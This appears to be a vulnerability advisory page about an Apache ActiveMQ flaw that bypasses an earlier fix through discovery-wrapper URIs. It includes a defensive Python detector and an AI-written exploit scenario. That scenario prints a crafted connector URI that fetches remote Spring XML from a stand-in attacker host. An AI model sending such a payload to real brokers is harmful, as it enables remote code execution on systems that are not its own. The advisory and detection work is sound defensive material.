
Apache ActiveMQ EUVD-2026-33576

CVE-2026-45505 HIGH
Improper Input Validation (CWE-20)
2026-06-01 security@apache.org GHSA-v853-w46p-fv2h
8.8
CVSS 3.1 · NVD

Severity by source

NVD PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

CVE Published
Jun 22, 2026 - 06:03 cve.org
HIGH 8.8
Analysis Generated
Jun 01, 2026 - 15:23 vuln.today
CVSS changed
Jun 01, 2026 - 15:22 NVD
8.8 (HIGH)
Patch available
Jun 01, 2026 - 10:01 EUVD
CVE Published
Jun 01, 2026 - 09:16 nvd
UNKNOWN (no severity yet)

Description (CVE.org)

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ.

Non-parenthesized discovery wrappers such as masterslave:vm://...,... and static:vm://... incorrectly pass validation, allowing a bypass of the fix for CVE-2026-34197.

Original description from CVE-2026-34197.

Apache ActiveMQ exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6.

Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue.
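As an added example (not part of the vuln.today page or of ActiveMQ's own code), the following Python models the validation gap the description names and a matching detection for defenders: it unwraps discovery wrappers in both the parenthesized `static:(...)` form and the bare `static:vm://...` form before checking for a vm:// transport that carries brokerConfig, and it flags Jolokia exec requests to addNetworkConnector/addConnector whose argument fails that check. WRAPPER_SCHEMES, SENSITIVE_OPS and the function names are assumptions of this example; sample inputs are constructed from the URI shape quoted on this page.

```python
import json
from urllib.parse import parse_qs, urlsplit

# Wrapper schemes that carry inner transport URIs (assumed list for this
# example, not ActiveMQ's own transport registry).
WRAPPER_SCHEMES = {"masterslave", "static", "failover", "discovery", "multicast"}
SENSITIVE_OPS = {"addNetworkConnector", "addConnector"}


def unwrap_discovery(uri):
    """Innermost transport URIs of a nested connector URI, accepting both the
    parenthesized static:(vm://a,tcp://h:61616) and bare static:vm://a forms."""
    scheme, sep, rest = uri.partition(":")
    if not sep or scheme.lower() not in WRAPPER_SCHEMES:
        return [uri]
    if rest.startswith("("):                 # drop outer parens and ?options
        close = rest.rfind(")")
        if close < 0:
            return [uri]                     # unbalanced: treat as opaque
        rest = rest[1:close]
    parts, buf, depth = [], "", 0            # split on top-level commas only
    for ch in rest:
        if ch == "," and depth == 0:
            parts.append(buf)
            buf = ""
            continue
        depth += (ch == "(") - (ch == ")")
        buf += ch
    parts.append(buf)
    return [u for p in parts for u in unwrap_discovery(p.strip())]


def is_unsafe_connector_uri(uri):
    """True when any inner URI is a vm:// transport carrying brokerConfig."""
    for inner in unwrap_discovery(uri):
        parts = urlsplit(inner)
        keys = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
        if parts.scheme.lower() == "vm" and "brokerconfig" in keys:
            return True
    return False


def flag_jolokia_request(body):
    """Flag a Jolokia exec request that would register an unsafe connector."""
    try:
        req = json.loads(body)
    except ValueError:
        return False
    op = str(req.get("operation", "")).split("(")[0]
    if req.get("type") != "exec" or op not in SENSITIVE_OPS:
        return False
    return any(isinstance(a, str) and is_unsafe_connector_uri(a) for a in req.get("arguments") or [])
```

A check that only recognises the parenthesized wrapper form would miss the bare form; unwrapping recursively before inspecting the scheme closes that gap for every nesting depth.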

Analysis (AI)

Remote code execution in Apache ActiveMQ Broker, ActiveMQ All, and ActiveMQ (versions before 5.19.7 and 6.0.0 before 6.2.6) allows authenticated attackers to bypass the CVE-2026-34197 fix using non-parenthesized discovery wrappers such as masterslave:vm://... and static:vm://..., which incorrectly pass validation and trigger the VM transport's brokerConfig parameter to load a remote Spring XML application context. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Obtain ActiveMQ console credentials
Delivery: Reach /api/jolokia/ JMX-HTTP bridge
Exploit: Invoke addNetworkConnector with masterslave:vm:// or static:vm:// wrapper
Install: Bypass CVE-2026-34197 validation
C2: Broker fetches attacker-hosted Spring XML
Execute: ResourceXmlApplicationContext instantiates malicious bean
Impact: Execute arbitrary code as broker JVM user

Vulnerability Assessment (AI)

Exploitation: The attacker must hold valid authentication credentials for the ActiveMQ web console / Jolokia endpoint (CVSS PR:L), and the Jolokia JMX-HTTP bridge at /api/jolokia/ must be reachable from the attacker; it is enabled by default on the ActiveMQ web console. …
Risk Assessment: Signals are mixed. …
Exploit Scenario: An attacker with valid (or default/weak) ActiveMQ console credentials sends an authenticated HTTP POST to /api/jolokia/ invoking BrokerService.addNetworkConnector with a crafted URI such as `masterslave:vm://broker?brokerConfig=xbean:http://attacker.example/evil.xml`. The wrapper bypasses the CVE-2026-34197 input validation, the VM transport resolves the brokerConfig parameter, and Spring's ResourceXmlApplicationContext fetches and instantiates the attacker's XML, executing arbitrary commands via a Runtime.exec bean factory method as the broker's JVM user. …
Remediation: Vendor-released patch: upgrade to Apache ActiveMQ 5.19.7 (for the 5.x line) or 6.2.6 (for the 6.x line) per the Apache announcement at https://lists.apache.org/thread/7n97nddyw96w6ykldjv1h40jx86xdo0w. …




EUVD-2026-33576 vulnerability details – vuln.today
